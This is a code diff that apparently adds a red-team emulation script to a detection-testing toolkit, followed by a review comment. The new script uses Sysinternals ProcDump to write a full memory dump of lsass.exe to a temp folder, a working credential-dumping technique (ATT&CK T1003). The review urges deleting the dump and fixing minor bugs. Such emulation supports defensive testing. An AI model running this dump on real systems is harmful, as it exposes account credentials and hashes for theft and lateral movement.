diff --git a/README.md b/README.md
index 91a002d..aa09823 100755
--- a/README.md
+++ b/README.md
@@ -24,7 +24,7 @@ The following table provides dependency information:
 | Dependency | RTAs | source |
 | --- | --- | --- |
-| Sysinternals Suite | user_dir_escalation.py, sip_provider.py, system_restore_proc.py, trust_provider.py | [Microsoft](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) |
+| Sysinternals Suite | lsass_memory_dump.py, user_dir_escalation.py, sip_provider.py, system_restore_proc.py, trust_provider.py | [Microsoft](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) |
 | MsXsl | msxsl_network.py | [Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=21714) |
diff --git a/red_ttp/common.py b/red_ttp/common.py
index c7c8213..bc2f896 100755
--- a/red_ttp/common.py
+++ b/red_ttp/common.py
@@ -313,6 +313,7 @@ def check_system():
 PS_EXEC = get_path("bin", "PsExec.exe")
+PROCDUMP = get_path("bin", "procdump.exe")
 def run_system(arguments=None):
diff --git a/red_ttp/lsass_memory_dump.py b/red_ttp/lsass_memory_dump.py
new file mode 100644
index 0000000..f50547d
--- /dev/null
+++ b/red_ttp/lsass_memory_dump.py
@@ -0,0 +1,40 @@
+# Name: Dump LSASS Memory with ProcDump
+# RTA: lsass_memory_dump.py
+# ATT&CK: T1003
+# Description: Uses Sysinternals ProcDump to dump the memory space of lsass.exe.
+
+import common
+import os
+import errno
+
+DUMPFILE = "C:\Windows\Temp\RTA\lsass.dmp"
+@common.dependencies(common.PROCDUMP)
+def main():
+
+    common.log("Ensuring dump folder exists...")
+    if os.path.exists(os.path.dirname(DUMPFILE)):
+        common.log("Dump folder exists, moving on!")
+    else:
+        common.log("Dump folder doesn't exist, creating...")
+        try:
+            os.makedirs(os.path.dirname(DUMPFILE))
+        except OSError as e:
+            if e.errno != errno.EEXIST:
+                common.log("Failed to create dump folder!")
+                raise
+
+    common.log("Executing procdump.exe...")
+    code, output = common.execute([common.PROCDUMP, "-accepteula", "-ma", "lsass.exe", DUMPFILE])
+
+    if code == 0:
+        common.log("Successfully executed procdump.exe!")
+    else:
+        common.log("Failed to execute procdump.exe.")
+
+    if os.path.exists(DUMPFILE):
+        common.log("Successfully created " + DUMPFILE)
+    else:
+        common.log ("Failed to create " + DUMPFILE)
+
+if __name__ == "__main__":
+    exit(main())
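Review bot: The dump is left on disk after the final `os.path.exists(DUMPFILE)` check in main(): a full `-ma` dump of lsass.exe holds the cached credentials, NTLM hashes and Kerberos tickets of every logged-on account, so leaving `C:\Windows\Temp\RTA\lsass.dmp` behind turns a detection test into a persistent credential exposure for anyone who can read that directory. Remove it as soon as its presence has been confirmed, e.g. in the success branch add `os.remove(DUMPFILE)  # the dump contains live credentials; never leave it on disk`, ideally inside a `finally` so a failure after the file was written still cleans up. Two smaller points on the same lines: `DUMPFILE` is a non-raw string containing backslashes (`\W`, `\T`, `\R`, `\l` happen not to be escape sequences today, but the literal emits a SyntaxWarning on Python 3.12+), so write it as `r"C:\Windows\Temp\RTA\lsass.dmp"`; and `exit(main())` always exits 0 because main() returns None, so a failed procdump run (e.g. access denied when LSA runs as a protected process) is invisible to whatever drives the RTA — have main() return `code`, or 1 when the dump file is missing.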